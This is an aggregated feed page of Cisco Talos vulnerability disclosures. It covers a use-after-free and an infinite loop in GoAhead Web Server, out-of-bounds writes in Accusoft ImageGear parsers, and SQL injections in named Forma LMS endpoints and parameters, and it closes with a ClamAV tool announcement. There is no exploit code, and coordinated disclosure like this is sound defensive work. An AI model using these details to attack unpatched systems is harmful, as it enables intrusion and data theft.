                EmbedThis’ GoAhead Web Server contains two vulnerabilities that both arise when the software attempts to process a multi-part/form-data HTTP request. An attacker could exploit these vulnerabilities to remotely execute code on the victim machine, or cause a denial-of-service condition.

                GoAhead Web Server is a popular embedded web server designed to be a fully customizable web application framework and server for embedded devices. It provides all the base HTTP server functionality and provides a highly customizable platform for developers of embedded web applications.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with EmbedThis to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                EmbedThis GoAhead web server code execution vulnerability (TALOS-2019-0888/CVE-2019-5096)

                An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5. A specially crafted HTTP request can lead to a use-after-free condition during the processing of this request that can be used to corrupt heap structures that could lead to full code execution. The request can be unauthenticated in the form of GET or POST requests, and does not require the requested resource to exist on the server.

                Read the complete vulnerability advisory here for additional information.

                EmbedThis GoAhead web server denial-of-service vulnerability (TALOS-2019-0889/CVE-2019-5097)

                A denial-of-service vulnerability exists in the processing of multi-part/form-data requests in the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5. A specially crafted HTTP request can lead to an infinite loop in the process. The request can be unauthenticated in the form of GET or POST requests and does not require the requested resource to exist on the server.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos researchers tested and confirmed that versions 5.0.1, 4.1.1 and 3.6.5 of EmbedThis GoAhead is affected by these vulnerabilities.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 51331, 51332

                Vulnerability Spotlight: Accusoft ImageGear PNG IHDR width code execution vulnerability

                $
                0
                0

                Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Accusoft ImageGear contains two remote code execution vulnerabilities. ImageGear is a document and imaging library from Accusoft that developers can use to build their applications. The library contains the entire document imaging lifecycle. This vulnerability is present in the Accusoft ImageGear library, which is a document-imaging developer toolkit.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Accusoft to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Accusoft ImageGear TIFF TIF_decode_thunderscan code execution vulnerability (TALOS-2019-0875/CVE-2019-5083)

                An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll TIF_decode_thunderscan function of Accusoft ImageGear 19.3.0 library. A specially crafted TIFF file can cause an out of bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Accusoft ImageGear PNG IHDR width code execution vulnerability (TALOS-2019-0865/CVE-2019-5076)

                An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll PNG header-parser of the Accusoft ImageGear 19.3.0 library. A specially crafted PNG file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Accusoft ImageGear GEM raster code execution vulnerability (TALOS-2019-0921/CVE-2019-5132)

                An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll GEM Raster parser of the Accusoft ImageGear 19.3.0 library. A specially crafted GEM file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Accusoft ImageGear BMP code execution vulnerability (TALOS-2019-0922/CVE-2019-5133)

                An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll BMP parser of the ImageGear 19.3.0 library. A specially crafted BMP file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that Accusoft ImageGear, version 19.3.0, is affected by these vulnerabilities.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 3132, 32889, 50806, 50807, 51530, 51531, 52033, 52034

                Vulnerability Spotlight: SQL injection vulnerabilities in Forma Learning Management System

                $
                0
                0

                Yuri Kramarz of Security Advisory EMEAR discovered these vulnerabilities. Blog by Jon Munshaw. 

                Cisco Talos recently discovered three SQL injection vulnerabilities in the authenticated portion of the Formal Learning Management System. LMS is a set of software that allows companies to build and host different training courses for their employees. The software operates with an open-source licensing model and now operates under the Forma organization.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Forma to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Forma LMS 2.2.1 /appLms/ajax.server.php filter_cat and filter_status parameters SQL injections (TALOS-2019-0904, CVE-2019-5111/CVE-2019-5112)

                Exploitable SQL injection vulnerabilities exist in the authenticated portion of Forma LMS 2.2.1. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and, in certain configurations, access the underlying operating system.

                Read the complete vulnerability advisory here for additional information.

                Forma LMS 2.2.1 /appCore/index.php users parameter SQL injections (TALOS-2019-0903, CVE-2019-5110)

                Exploitable SQL injection vulnerabilities exist in the authenticated portion of Forma LMS 2.2.1. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and, in certain configurations, access the underlying operating system.

                Read the complete vulnerability advisory here for additional information.

                Forma LMS 2.2.1 ajax.adm_server.php dir parameter SQL injections (TALOS-2019-0902, CVE-2019-5109)

                Exploitable SQL injection vulnerabilities exist in the authenticated portion of Forma LMS 2.2.1. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, user credentials and, in certain configurations, access the underlying operating system.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos researchers tested and confirmed that these vulnerabilities impact version 2.2.1 of Forma LMS.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 51611 - 51619

                ClamAV team shows off new Mussels dependency build automation tool

                $
                0
                0

                By Micah Snyder.

                Today I'm very excited, and a little bit nervous, to unveil Mussels. Mussels is a cross-platform, general-purpose dependency build automation tool. You might compare it with Vcpkg, Conan, or Buildout. It serves a similar purpose, but the approach is a little different.

                Mussels is intended to simplify the process of building complex applications that have lengthy dependency chains without having to write all new CMake, Meson, Bazel, XCode, or Visual Studio project files. Instead, you write (and share) simple recipes that leverage the original build systems intended by software authors of your external library dependencies.

                For more on Mussels, and where to download it, read the complete post over at the ClamAV blog.
                Viewing all 2032 articles
                Browse latest View live